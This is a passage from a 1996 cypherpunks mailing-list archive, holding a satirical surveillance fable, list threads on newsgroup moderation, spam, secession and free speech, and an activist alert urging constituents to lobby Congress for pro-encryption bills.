had been discovered that torture was an extremely effective way to
solve crimes. Ruritania had banned this practice in spite of its
expedience. Indeed, "why have warrants at all", he asked, "if we are
interested only in expedience?"

A famous paint technologist, Dorothy Quisling, intervened however. She
noted that people might take photographs of children masturbating
should the new paint technology be widely deployed without safeguards,
and the law was passed.

Soon it was discovered that some citizens would cover their mouths
while speaking to each other, thus preventing the police from reading
their lips through the video cameras. This had to be prevented, the
police said. After all, it was preventing them from conducting their
lawful surveillance. The wise man pointed out that the police had
never before been allowed to listen in on people's homes, but Dorothy
Quisling pointed out that people might use this new invention of
covering their mouths with veils to discuss the kidnapping and
mutilation of children. No one in the legislature wanted to be accused
of being in favor of mutilating children, but then again, no one
wanted to interfere in people's rights to wear what they liked, so a
compromise was reached whereby all homes were installed with
microphones in each room to accompany the video cameras. The wise man
lamented few if any child mutilations had ever been solved by the old
lip reading technology, but it was too late -- the microphones were
installed everywhere.

However, it was discovered that this was insufficient to prevent
citizens from hiding information from the authorities, because some of
them would cleverly speak in languages that the police could not
understand. A new law was proposed to force all citizens to speak at
all times only in Ruritanian, and, for good measure, to require that
they speak clearly and distinctly near the microphones. "After all",
Dorothy Quisling pointed out, "they might be using the opportunity to
speak in private to mask terrorist activities!" Terrorism struck
terror into everyone's hearts, and they rejoiced at the brilliance of
this new law.

Meanwhile, the wise man talked one evening to his friends on how all
of this was making a sham of the constitution of Ruritania, of which
all Ruritanians were proud. "Why", he asked, "are we obligated to
sacrifice all our freedom and privacy to make the lives of the police
easier?  There isn't any real evidence that this makes any big dent in
crime anyway! All it does is make our privacy forfeit to the state!"

However, the wise man made the mistake of saying this, as the law
required, in Ruritanian, clearly and distinctly, and near a
microphone. Soon, the newly formed Ruritanian Secret Police arrived
and took him off, and got him to confess by torturing him. Torture
was, after all, far more efficient than the old methods, and had been
recently instituted to stop the recent wave of people thinking obscene
thoughts about tomatoes, which Dorothy Quisling noted was one of the
major problems of the new age of plenty and joy.

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John C. Randolph" <jcr@idiom.com>
Date: Thu, 22 Aug 1996 12:12:57 +0800
To: cypherpunks@toad.com
Subject: Husband/Wife jailed for saying Clinton SucksHusband/Wife jailed for say
Message-ID: <199608220141.SAA05126@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain


> Frankly, I'd rather have a president who didn't feel the need to be 
> protected by thugs.

Well, wouldn't that require a president who had a clear conscience?
I don't think we've had one of those since Eisenhower!

-jcr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Skip)
Date: Thu, 22 Aug 1996 13:09:05 +0800
To: ichudov@algebra.com
Subject: Re: PreRFD: comp.org.cypherpunks
In-Reply-To: <199608211928.OAA29624@manifold.algebra.com>
Message-ID: <199608220144.SAA21861@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ON
! 
! if it is _robo_moderated, there would not be timing issues.

Exactly the same problem of one machine that can recieve and make the posts,
one script, one moderator in charge of the whole thing, which experience 
indicates they eventually abuse their resonsibility by keeping it after 
they lose interest in managing the group.

! igor
! 
! Skip, OBC wrote:
! > 
! > ! Jim McCoy wrote:
! > ! > qut@netcom.com (Skip) writes:
! > ! > > My suggestion number #1:
! > ! > > No moderation.
! > ! > 
! > ! > Suggestion 1 on how to diminish the feeble S/N ratio on cypherpunks:
! > ! > 
! > ! >         make it a newsgroup
! > ! > Suggestion 2:
! > ! >         make it an unmoderated newsgroup
! > ! 
! > ! How about making it a robomoderated newsgroup with only one enforced
! > ! rule, forbidding any crossposting?
! > 
! > If moderation, then why not moderator(s) who simply send out cancel 
! > messages to everthing that is crossposted?  Traditional moderated 
! > newsgroups are technically inferior because all posts go through netnews 
! > chokepoints and then depends on the moderator(s) who's inevitable 
! > position has been the irresponsible one of keeping the position long 
! > after they lose interest with the high volumes.  Even if their was such
! > a person, there is still are chokepoint problem which is stupid to  
! > engage in.
! > 
! > In any case, creation of comp.org.cypherpunks in no way means gatewaying 
! > or shutting down cypherpunks@toad.com .
! > 
! > 
! > --
! > Love, 
! > Skip, OBC
! > 
! 
! 
! 
! 	- Igor.
! 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Skip)
Date: Thu, 22 Aug 1996 12:52:02 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: PreRFD: comp.org.cypherpunks
In-Reply-To: <sD41sD3w165w@bwalk.dm.com>
Message-ID: <199608220147.SAA22328@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ON
! 
! qut@netcom.com (Skip, OBC) writes:
! 
! > ! Jim McCoy wrote:
! > ! > qut@netcom.com (Skip) writes:
! > ! > > My suggestion number #1:
! > ! > > No moderation.
! > ! > 
! > ! > Suggestion 1 on how to diminish the feeble S/N ratio on cypherpunks:
! > ! > 
! > ! >         make it a newsgroup
! > ! > Suggestion 2:
! > ! >         make it an unmoderated newsgroup
! > ! 
! > ! How about making it a robomoderated newsgroup with only one enforced
! > ! rule, forbidding any crossposting?
! > 
! > If moderation, then why not moderator(s) who simply send out cancel 
! > messages to everthing that is crossposted?  Traditional moderated 
! > newsgroups are technically inferior because all posts go through netnews 
! > chokepoints and then depends on the moderator(s) who's inevitable 
! > position has been the irresponsible one of keeping the position long 
! > after they lose interest with the high volumes.  Even if their was such
! > a person, there is still are chokepoint problem which is stupid to  
! > engage in.
! > 
! > In any case, creation of comp.org.cypherpunks in no way means gatewaying 
! > or shutting down cypherpunks@toad.com .
! 
! How about a NoCeM-moderated newsgroup?
! I.e., several parties can issue 'hide' NoCeM notices for whatever
! material they consider off-topic, including cross-posts. Several
! other parties can issue 'highlight' NoCeM's for articles they
! consider particularly worthy.

With the advent of killfiles and all sorts of filtering capabilities, 
there is no excuse for requiring moderation at all other than for 
purposes of censorship.

! ---
! 
! Dr.Dimitri Vulis KOTM
! Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
! 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Thu, 22 Aug 1996 09:35:31 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9608212250.AA14289@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


The Postal service is working on a new postage method, 2 key signature, which will be unique to each "postal unit" ( stamp ) the signature will be logged when you buy the stamps....No more anon. snail mail......

Just thought you'd like to know !





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Thu, 22 Aug 1996 13:22:36 +0800
To: Bovine Remailer <haystack@cow.net>
Subject: Re: your mail
In-Reply-To: <9608212250.AA14289@cow.net>
Message-ID: <Pine.3.89.9608211936.A5488-0100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain


Uh huh.  Sure.  I believe nothing more needs to be said about this.

---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127


On Wed, 21 Aug 1996, Bovine Remailer wrote:

> The Postal service is working on a new postage method, 2 key signature, 
> which will be unique to each "postal unit" ( stamp ) the signature will 
> be logged when you buy the stamps....No more anon. snail mail......
> 
> Just thought you'd like to know !
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 22 Aug 1996 08:09:39 +0800
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <Pine.HPP.3.91.960821144412.10644C-100000@cor.sos.sll.se>
Message-ID: <321B4FB3.1CFBAE39@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Asgaard wrote:
> 
> On Tue, 20 Aug 1996, Timothy C. May wrote:
> 
> > There are technological fixes which I would favor over attempts to ban
> > unwanted messages.
> 
> In the meantime, before these technological fixes are easily implemented,
> what is the proper way to handle unwanted commercial mail?
> 
> 1) delete immediately
> 
> 2) reply with 'Fuck off, morons!'
> 
> 3) as in 2) plus an attachment of some 1Mb file
> 
> 4) as in 3) plus a CC to the postmaster of the sending site
> 
> What if the spam says: 'Do only reply to this if you want
> further contact with us' etc?
> 
> Does anybody have good advice, including risks for retaliation
> from the vendors/postmasters for such 're-spam'?


I always send a quick one liner - "Please send me more information". 
Often I'll ask a stupid question too ("Does your software work in
France?").  If more people did this, then they'd have to choose their
victims a bit more carefully in the future (assuming of course they're
trying to sell something).

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 22 Aug 1996 12:01:31 +0800
To: jfricker@vertexgroup.com (John F. Fricker)
Subject: Re: www.usdoj.gov http://156.46.199.41/
In-Reply-To: <2.2.32.19960821224538.00678be8@vertexgroup.com>
Message-ID: <199608220111.UAA31683@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


John F. Fricker wrote:
> 
> a mirror of the hack is at http://156.46.199.41/
> 

and http://www.algebra.com/~ichudov

(usdoj.tar.gz is also available for mirroring).

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 22 Aug 1996 13:45:56 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
Message-ID: <2.2.32.19960822032019.00e8d6e0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:28 PM 8/21/96 -0700, Timothy C. May wrote:

>(By the way, some of you younger folks may not remember all the creative
>ways people used to have to deal with unwanted junk mail. For "return
>postage provided" replies, they would often attach the return forms to
>large packages of stuff (sometimes even organic, stinky stuff) and let the
>junk mailer eat the postage charges at his end. Or they'd fill out the "get
>free stuff" forms with the addresses of local officials.)

Return reply envelopes can be alot of fun.  

In "A Handful of Zen" by Camden Benares (a book on Discordian Zen) he
suggests collecting them.  When you have something sufficiently weird for a
mass mailing, you just fill a bunch of them and drop them in the local
public posting bin.

An interesting way to releave the daily stress...
---
|  "Remember: You can't have BSDM without BSD. - alan@ctrl-alt-del.com  "|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 22 Aug 1996 11:38:16 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Any CPs in D.C.?
In-Reply-To: <Pine.3.89.9608211445.A23772-0100000@netcom14>
Message-ID: <Pine.SUN.3.91.960821200855.13678D-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hey, I'm In DC this month - but already know what you look like ;)

Simon

On Wed, 21 Aug 1996, Lucky Green wrote:

> I will be in D.C. through Saturday. I'd like to meet some Cypherpunks 
> that feel like getting to know what Lucky looks like :-)
> 
> If you are in D.C., give me a call at my hotel.
> (202) 682-0111 x440
> 
> --Lucky
> 
> 
> 
> 

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 22 Aug 1996 14:02:26 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <199608220351.UAA01292@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:55 PM 8/21/96 -0400, Brian Davis wrote:

>> 
>> Makes me wonder whether visiting one of these appearances with a "Clinton 
>> Doll" and a bunch of pins, and visibly inserting those pins into the doll 
>> (while uttering various strange incantations), would constitute a "threat."
>> 
>> Frankly, I'd rather have a president who didn't feel the need to be 
>> protected by thugs.
>
>That's because you like dead Presidents. 
>

$50's and $100's are great!

(I also like old fat dead philosophers, as well.)


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 22 Aug 1996 14:43:28 +0800
To: cypherpunks@toad.com
Subject: usenet not working with Agent now.
Message-ID: <199608220408.VAA02413@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Agent keeps reporting bad server.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Thu, 22 Aug 1996 14:24:16 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Canada Imprisons People For Human Rights Activity
Message-ID: <199608220417.VAA06243@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About 21 Aug 96, 22:15, Dr.Dimitri Vulis KOTM wrote:

> Alaska rightfully belongs to Russia, as do California and Hawaii.
> 

No way.  We bought that stuff.  Then we spent the USSR into the dark 
ages, winning the Cold War.  Right?  Huh? What?

Ross (Boy do I Hate Those Pesky Spammers) Wright

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 22 Aug 1996 12:07:35 +0800
To: cypherpunks@toad.com
Subject: Re: Canada Imprisons People For Human Rights Activity
In-Reply-To: <ae40f6b0130210045167@[205.199.118.202]>
Message-ID: <v03007808ae415e2722da@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:18 PM -0400 8/21/96, Timothy C. May wrote:

> Almost certainly nothing. I believe there is an active secessionist
> movement in Alaska, and nothing has happened to them.

Depends on what you call "active".

Say, five? ten? years ago, the Alaska Independence Party (all of about 12
people at the time) got hijacked by Wally Hickell in his second run for the
Alaska Governor's office. He had to do it that way, because he had pissed
off the Republican party regulars. And it worked. The hijacking, I mean. He
actually got elected. For his one (1) remaining legal term.  (Remember
Wally? Hotel Owner. Former Alaska Governor in the late 1960's. He was
Nixon's Interior Secretary. For a while, anyway. A few bricks shy of a
load, Wally was, and that's from someone who actually met him.)

The liberal jokesters called AIP "Rent-A-Party" after that. Their founder
and patron saint, Joe Vogler, died under mysterious circumstances a couple
of years ago. Turns out he was murdered by a follower. (Other people say it
was Donna Rice operating under orders from George Bush. ;-).) Joe was a
quite few bricks shy, himself.

However, I expect my old man probably would have flown up from retirement
in New Mexico to old Joe's funeral, if Pop was alive to do it, of course.
Alaska attracts people like Joe and Wally and my old man. (No stranger to
bricklessness, himself, Pop was a founder of the El Paso John Birch Society
chapter. He dragged us all up to Anchorage on a whim to build a whole bunch
of 12-plexes after I finished 6th grade. Just before the pipline started.
Then retired on it all. OK, scratch the "bricklessness" bit...)

Old Joe used to tool around on his homestead in an old bulldozer, randomly
plowing under the spruce trees and filling in the muskeg "wetlands", just
to have fun with the press and give the tree-huggers apoplexy. Wanted to
create some kind of libertarian utopia up in in Alaska, where if you wanted
to exterminate all the biomass on your property one sunny summer afternoon,
you were welcome to, as long as you had clear title.

My kind of guy. :-).

AIP got all of 2% in the last election, I think.

Sic Transit Gloria Mundi.


So, they were "active" (past tense) and I guess you could say something
"happened" to them, too...

Cheers,
Bob Hettinga
(Just some more pipline trash...)

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 22 Aug 1996 13:20:38 +0800
To: haystack@cow.net (Bovine Remailer)
Subject: Re: your mail
In-Reply-To: <9608212250.AA14289@cow.net>
Message-ID: <199608220245.VAA32285@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Bovine Remailer wrote:
> 
> The Postal service is working on a new postage method, 2 key
> signature, which will be unique to each "postal unit" ( stamp ) the
> signature will be logged when you buy the stamps....No more anon. snail
> mail......  > > Just thought you'd like to know !  >

So I'd engage in the business of buying stamps and selling them
to anyone for cash, anonymously.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 22 Aug 1996 12:46:45 +0800
To: ichudov@algebra.com
Subject: Re: Canada Imprisons People For Human Rights Activity
In-Reply-To: <199608211933.OAA29688@manifold.algebra.com>
Message-ID: <Pine.SV4.3.91.960821214832.28623D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> OK, so what would happen if I organized a party with the proclaimed goal
> of secession of Oklahoma from the United States?


  ...already bought the T-shirt.;   Check out the Southern League, POB 
40910, Tuscaloosa Alabama 35404   205-553-0155

They have stgate chapters in every southern state are working towards 
devolution.

I don't think it will happen in my lifetime. On the other hand.... the 
bigger they are, the faster they fall.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Thu, 22 Aug 1996 13:29:00 +0800
To: cypherpunks@toad.com
Subject: ALERT: Show Congress you want privacy during Crypto Action Week! (8/20/96)
Message-ID: <199608220208.WAA23141@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


===========================================================================
  ___ _____   _____ _____ ___  
 / __| _ \ \ / / _ \_   _/ _ \     JOIN THOUSANDS OF OTHER NET.AMERICANS AS
| (__|   /\ V /|  _/ | || (_) |	 THEY WORK FOR BETTER PRIVACY AND ENCRYPTION
 \___|_|_\ |_| |_|   |_| \___/ 	  	     September 3-10, 1996
  ___   ___ _____ ___ ___  _  _  __      _____ ___ _  __
 / _ \ / __|_   _|_ _/ _ \| \| | \ \    / / __| __| |/ /
|  _  | (__  | |  | | (_) | .` |  \ \/\/ /| _|| _|| ' <
|_| |_|\___| |_| |___\___/|_|\_|   \_/\_/ |___|___|_|\_\

     SENATE PRO-CRYPTO PRO-CODE BILL COULD BE VOTED OUT OF COMMITTEE
         YOUR HELP IS NEEDED TO PREPARE CONGRESS FOR THE DEBATE!
		     http://www.crypto.com/caw/

      Reproduce this where appropriate until September 15, 1996
---------------------------------------------------------------------------
Table of Contents
	News from the frontlines
	What you must do
	Concluding the meeting
	Tips on how to conduct your visit
	Angles on encryption
	Questions about encryption you might be asked
	Participating Organizations / More Information

---------------------------------------------------------------------------
NEWS FROM THE FRONTLINES

Congress as a whole is beginning to focus on encryption - bills moving
through both House and Senate would improve availability of privacy and
security for the Net.  With three hearings in the Senate and one
scheduled in House Judiciary Committee for early September -
pro-encryption bills have a chance of passing, or at least helping to
lay the groundwork for the next Congress.

Recently in a live chat from the Republican Convention in San Diego,
Senator Conrad Burns (R-MT) said he believed he had enough votes to
pass Pro-CODE out of the Senate Sub-Committee and Committee.  This
is the farthest encryption activists will have come in the crypto fight
in years.

We need your help to make the case to Congress that encryption is
important to privacy and security online, as well as the future potential
of the Internet to create jobs and promote US competitiveness.  Here's what
you can do:
	-sign the petition at http://www.crypto.com/petition/
	-make an appointment with your legislator's local office

With the directions below, visit your Congressperson - urge them to
support the two bills: Pro-CODE "Promotion of Commerce Online in the
Digital Era" (S.1726) & SAFE "Security and Freedom Through Encryption"
(HR 3011).

Now is the time to tell your member of Congress that government
restrictions on encryption are unacceptable to the future of the
Internet.  In recent months, the FBI and the White House have been
using local sheriffs to lobby members of Congress on this issue.  If
you don't tell your member of Congress our side of the story, they
won't hear it from anyone.

---------------------------------------------------------------------------
WHAT YOU MUST DO

Here's what you need to do:

1. Make an appointment with your Senators'/Representative's local office.
   It's probably best to make an appointment with the local office manager.
   It's great if you can get an appointment with your legislator, but 
   don't worry if your legislator cannot be there.

   If you don't know who your Representative and two Senators are, simply
   call the local League of Women Voters office and ask!  You might also
   try using the Zipper at http://www.voxpop.org:80/zipper/

2. Sign the petition at http://www.crypto.com/petition/
   A petition has been setup to help show Congress that encryption policy
   must be driven by the market's concerns.
   
3. Setting up the meeting
   When making the appointment, you should say that the topic is
   privacy and encryption on the Internet.  Ensure they know you are a
   constituent.  If possible, take a friend who owns a small Internet
   business (web design, ISP, whatever) who also lives in the
   district.

   It's crucial that you do not wait to get someone to go before making the
   appointment.  Make the appointment, then go looking for someone to go
   with you.

4. Carry the following message as a theme through your meeting.

   Encryption is important to privacy - the Internet is vulnerable
   and the future of American competitiveness is at stake.  Encryption
   is NOT a terrorist weapon any more than a hammer is a terrorist
   weapon.  While there are difficult national security issues,
   these should not be the driving force of this debate.

   The future of the Internet should not be held hostage by a cold-war
   era world view.

5. Send us mail at vtw@vtw.org when you've made your appointment.  Check
   back at http://www.crypto.com/caw/ for progress and tips on Crypto Action
   Week!

---------------------------------------------------------------------------
CONCLUDING THE MEETING

There are a few things you should remember as you finish your meeting.

If talking to a member, find out if we can count on his/her support for the
PRO-CODE/SAFE bill.  If talking to a staffer, make it their mission to
find out the answer to this question.

As you leave the meeting, run, don't walk, to the nearest card shop and
buy a thank you card.  Write a thank you and address it immediately.
Stick it in the nearest mailbox.

Send us mail at vtw@vtw.org, letting us know how it went.

----------------------------------------------------------------------------
TIPS ON HOW TO CONDUCT YOUR VISIT

Always be polite.  Never threaten.  Never lose your cool.

Many staffers have no idea what encryption is.  Moreover, they might have
never used the Internet.  You should view this as an opportunity: 
you will get the chance to define the debate and educate them.
You may even want to bring a laptop with a modem and take the member/staff
on a breif Internet tour.  (Be careful about what you show them.)

Remember we're all taxpayers, so the phrase "I'm a taxpayer" is
meaningless.

Be brief.  If you're going in a group, plan out the topics each person
will hit.  Appoint someone to act as a spokesperson for the group, so there
can be a central contact.

Remember the first law of Real Estate: LOCATION LOCATION LOCATION. It's
crucial that everyone at the meeting be a potential vote for the
legislator.

Remind yourself that your legislator probably hasn't yet made a decision
on this issue yet; you're there to educate as much as anything.

Go as *individuals* or *business owners* who have a stake in the debate
on encryption issue.

---------------------------------------------------------------------------
ANGLES ON ENCRYPTION

Internet business angle: When speaking from the point of view of an Internet
Service Provider or Web design firm, you have available several arguments,
such as:

	"The popularity of the Net has created a gold rush which has
	 benefitted my business and the local voters I employ.  Concerns
  	 about security on the net could dampen that excitement, and
	 diminish the potential for industry"

	"Many types of services that I would like to offer online cannot
	 be done without strong security.  The current level of security
   	 is too weak to engender public trust, and will diminish the
	 types of business people will put on the net."

Clipper angle: If someone brings up the issue of Clipper and the idea that
government should be trusted to hold your private encryption key, you have
several options available to you:

	"It's not clear that the Administration can be trusted to hold 
	 any information secret, after incidents like the FBI Filegate
	 scandal." 

	"Handing over one's encryption keys to the gov't is just like giving
	 the local police station a copy of your house key, just in case they
 	 need to search your apartment.  Of course they would promise never
	 to use it unless authorized."

---------------------------------------------------------------------------
QUESTIONS ABOUT ENCRYPTION YOU MIGHT BE ASKED

There are a number of questions you will probably be asked by the staff
or member that you should be prepared to answer.  Here's a few of them
and some answers you should feel comfortable with.

WHAT IS ENCRYPTION?

Encryption is a method of scrambling information with one or more "keys"
so that only the sender and receiver can read it, and an eavesdropper
cannot.  Your bank card PIN, telephone conversations, love letters, health
records, and business correspondence are all things that might need to
be encrypted.


WON'T TERRORISTS AND CRIMINALS USE ENCRYPTION?

Perhaps. But criminals and terrorists already have access to strong
encryption from overseas, and are unlikely to use encryption technologies
which they know are breakable by the US government.  Would you send
sensitive information using a code that you knew your adversaries could
break?

Criminals and terrorists will, for better or worse, have access to strong
encryption regardless of U.S. efforts to restrict its availability.
Meanwhile, current U.S. policy leaves sensative personal and business
communications vulnerable and actually creates opportunities for crimes like
industrial espionage.


WHAT IS 40 BIT ENCRYPTION? 

Quite often the strength of an encryption system is measured by the
size of the key.  Forty bits is about the same as a five or six letter
word, such as "apple".  The US government has stated that American
companies that wish to sell products with encryption can only implement
encryption whose keys are forty bits long.

At one time it was quite difficult to attack and recover messages that
were encrypted with 40 bit encryption.  Because of advances in computer
power and research, it has become much easier to do this.   As recently
as last year, a graduate student in France broke 40-bit encryption using
University resources he had available in his spare time.


DON'T EXPORT RESTRICTIONS PREVENT ENCRYPTION PRODUCTS FROM GOING ABROAD?

No. The idea that export restrictions actually keep encryption out of the
hands of non-U.S. citizens implies that all encryption products come
from the U.S.  This is simply untrue, and the plethora of products 
available from non-U.S. sources now shows how absurd it is to continue
to keep such regulations intact.  


DO EXPORT RESTRICTIONS HURT U.S. COMPANIES IN THE GLOBAL MARKETPLACE?

Yes. American hardware and software companies compete globally with products
from around the world.  For many companies, a majority of their business
comes from international sales.  In the crowded marketplace of this fast-
paced business, developing a product with a single feature that outshines a 
competitor's product can often be deciding factor in a consumer's mind.

Yet, American hardware and software businesses are at a disadvantage, as
many competing non-U.S. products can offer stronger encryption than they
can.  This places American products at a distinct competitive disadvantage.


DO EXPORT RESTRICTIONS LIMIT AMERICANS' CHOICE OF SECURITY PRODUCTS?

Yes. Although it is possible to sell two versions of a product, one with
strong encryption for sale domestically and one with weak encryption
for sale abroad, most companies find this schizophrenic product
development approach to be too burdensome and risky.  The result is that
companies that produce hardware and software products that require security
tend to omit such features entirely, or weaken them so that the same product
can be used for export as for domestic use.

The end result of this is that Americans end up with products that are
becoming increasingly incapable of protecting their privacy, hampered by
regulations that can longer accomplish their goal.

---------------------------------------------------------------------------
PARTICIPATING ORGANIZATIONS / MORE INFORMATION

For more information on the encryption issue, check these important
organizations' WWW sites:

	Center for Democracy and Technology (CDT): http://www.cdt.org
	Electronic Frontier Foundation (EFF): http://www.eff.org
	Electronic Privacy Information Center (EPIC): http://www.epic.org
	Voters Telecommunications Watch (VTW): http://www.vtw.org
	Wired Ventures Ltd.: http://www.hotwired.com

Also check these great educational sites:
	Encryption Policy Resource Page (http://www.crypto.com)
	Internet Privacy Coalition (http://www.privacy.org)

========================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 22 Aug 1996 13:36:48 +0800
To: cypherpunks@toad.com
Subject: Re: [Noise] RE: Canada Imprisons People For Human Rights Acti... (fwd)
Message-ID: <199608220315.WAA07169@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: qut@netcom.com (Skip)
> Subject: Re: [Noise] RE: Canada Imprisons People For Human Rights Acti...
> Date: Wed, 21 Aug 1996 18:31:38 -0700 (PDT)
> 
> ! > I do not believe that freedom of speech in the U.S.A. extends to actively
> ! > agitating for secession or the overthrow of the federal government.
> ! 
> ! The right to discuss revolt or secession or the overthrow of the federal
> ! government, it seems to me, is given below:
> ! 
> ! "We hold these Truths to be self-evident, that all Men are created
> ! equal, that they are endowed by their Creator with certain unalienable
> ! Rights, that among these are Life, Liberty, and the Pursuit of 
> ! Happiness - That to secure these Rights, Governments are instituted
> ! among Men, deriving their just Powers from the Consent of the
> ! Governed, that whenever any Form of Government becomes destructive of
> ! these Ends, it is the Right of the People to alter or to abolish it,
> ! and to institute new Government, laying its Foundation on such
> ! Principles, and organizing its Powers in such Form, as to them shall
> ! seem most likely to effect their Safety and Happiness.  ... "
> ! 
> ! Now this is the Declaration of Independence, and not the Constitution, but
> ! it seems to me that the right to discuss "agitating for secession or the
> ! overthrow of the federal government" is protected.
> 
> Correct, if government is not protecting our rights as a people, we are 
> responsible for forcing the government to do so, even if that means 
> changing of the guard, ie, successful radicalism.
> 

Might I add:

			AMENDMENTS TO THE CONSTITUTION 
 
	Articles in addition to, and Amendment of the Constitution of the 
United States of America, proposed by Congress, and ratified by the 
Legislatures of the several States, pursuant to the fifth Article of the 
original Constitution. 
 
 
 
				ARTICLE IX. 
 
	The enumeration of the Constitution, of certain rights, shall 
not be construed to deny or disparage others retained by the people. 
 
 
 
				ARTICLE X. 
 
	The powers not delegated to the United States by the Constitution, 
nor prohibited by it to the States, are reserved to the States respectively, 
or to the people. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 22 Aug 1996 13:57:42 +0800
To: cypherpunks@toad.com
Subject: Re: Canada Imprisons People For Human Rights Activity
In-Reply-To: <ae40f6b0130210045167@[205.199.118.202]>
Message-ID: <1Ri2sD70w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Senile tcmay@got.net (Timothy C. May) rants:
> I believe there is an active secessionist
> movement in Alaska, and nothing has happened to them.
>
> (This does not mean they would ever be allowed to succeed in seceeding, of
> course.)

Alaska rightfully belongs to Russia, as do California and Hawaii.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 22 Aug 1996 13:58:35 +0800
To: cypherpunks@toad.com
Subject: Re: Canada Imprisons People For Human Rights Activity
In-Reply-To: <199608211933.OAA29688@manifold.algebra.com>
Message-ID: <eaJ2sD72w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> jbugden@smtplink.alis.ca wrote:
> > Nota: Quebec recently held a referendum on seperation from Canada.=20
                                                  ^
